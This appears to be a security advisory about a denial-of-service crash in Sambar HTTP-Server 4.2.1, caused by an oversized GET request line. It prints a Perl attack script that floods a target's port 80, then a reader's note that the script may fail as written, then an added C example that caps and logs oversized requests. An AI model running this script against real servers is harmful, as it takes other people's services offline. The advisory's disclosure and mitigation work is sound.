COMMAND

    sambar

SYSTEMS AFFECTED

    Win32

PROBLEM

    Dennis Conrad found the following.  While testing the security of
    the Sambar HTTP-Server he found it vulnerable to a simple DoS
    attack.  Sending a "GET XXXX(...a lot of Xs...)XXXX HTTP/1.0"
    request crashes the server.  It will die WITHOUT logging the
    attack.  His testing environment:

        Sambar 4.2.1
        MS IE 5.0 (de)
        Windows 95 C (de)

    Sample exploit code follows:

    #!/usr/bin/perl

    #########
    # Sample DOS against the Sambar HTTP-Server
    # This was tested against Sambar 4.2.1 running on Windows95 C
    # This attack will NOT be logged! Only use it to determine if
    # your Server is vulnerable!
    #
    # Dennis Conrad (dennis@linuxstart.com)
    #

    use IO::Socket;

    print "+++++++++\n";
    print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n";
    print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n";

    if ($#ARGV != 0) {
            die "+ Please give the host address as argument\n"
    }

    opensocket ("\n");
    print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n";
    close $remote;

    opensocket ("\n+ The server seemed to be vulnerable to this attack\n");
    close $remote;
    die "+ The server does not seem to be vulnerable to this attack\n";

    sub opensocket {
            $remote = IO::Socket::INET->new (
                    Proto => "tcp",
                    PeerAddr => $ARGV[0],
                    PeerPort => "http(80)",
            ) || die "+ Can't open http-port on $ARGV[0]$_[0]";
            $remote->autoflush(1)
    }

    Using that many 9s on my version of Perl fails silently.  The
    above seems equivalent to: print $remote "GET  HTTP/1.0\n\n";

        steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999;'
        steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999 || die;'
        Died at -e line 1.
        steve@grok:/home/steve% perl -v

        This is perl, version 5.005_03 built for i386-freebsd
        [etc.]

SOLUTION

    Nothing yet.
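
    No fix is listed above.  As an added example (not part of the
    original advisory and not Sambar code), the following C code shows
    how an HTTP front end can cap the request line before parsing and
    log the rejection, so that an oversized "GET XXXX..." request is
    refused and leaves a record.  MAX_REQUEST_LINE, the function names,
    the log format and the sample peer address are assumptions; the
    advisory does not say why the server crashes.

```c
#include <stdio.h>
#include <string.h>
#define MAX_REQUEST_LINE 8192  /* assumed cap, not a Sambar setting */

enum rl_status { RL_OK, RL_INCOMPLETE, RL_TOO_LONG, RL_MALFORMED };

/* Classify the bytes received so far; length is decided before any parsing. */
enum rl_status check_request_line(const char *buf, size_t len, size_t *line_len)
{
    size_t scan = len < MAX_REQUEST_LINE ? len : MAX_REQUEST_LINE;
    const char *nl = memchr(buf, '\n', scan);
    if (nl == NULL)
        return len >= MAX_REQUEST_LINE ? RL_TOO_LONG : RL_INCOMPLETE;
    size_t n = (size_t)(nl - buf);
    if (n > 0 && buf[n - 1] == '\r') n--;     /* accept CRLF or bare LF */
    *line_len = n;
    /* Require "METHOD SP target SP HTTP/..." with non-empty method and target. */
    const char *sp1 = memchr(buf, ' ', n);
    if (sp1 == NULL || sp1 == buf)
        return RL_MALFORMED;
    const char *sp2 = memchr(sp1 + 1, ' ', n - (size_t)(sp1 + 1 - buf));
    if (sp2 == NULL || sp2 == sp1 + 1)
        return RL_MALFORMED;
    if (n - (size_t)(sp2 + 1 - buf) < 5 || memcmp(sp2 + 1, "HTTP/", 5) != 0)
        return RL_MALFORMED;
    return RL_OK;
}

/* Log line for a rejected request: peer, reason and byte count only; the
 * payload itself is never echoed, so it cannot flood or forge log entries. */
int format_reject_log(char *out, size_t outsz, const char *peer,
                      enum rl_status st, size_t len)
{
    static const char *const reason[] = { "ok", "incomplete",
        "request-line-too-long", "malformed-request-line" };
    return snprintf(out, outsz, "REJECT peer=%s reason=%s bytes_seen=%lu",
                    peer, reason[st], (unsigned long)len);
}

int main(void)
{
    static char big[MAX_REQUEST_LINE + 64];   /* constructed oversized request */
    char line[128]; size_t n = 0;
    memset(big, 'X', sizeof big);
    memcpy(big, "GET ", 4);
    format_reject_log(line, sizeof line, "192.0.2.10",   /* constructed peer */
                      check_request_line(big, sizeof big, &n), sizeof big);
    puts(line);
}
```

    The request with an empty target that the Perl note above
    describes ("GET  HTTP/1.0") is classified as malformed rather than
    passed on.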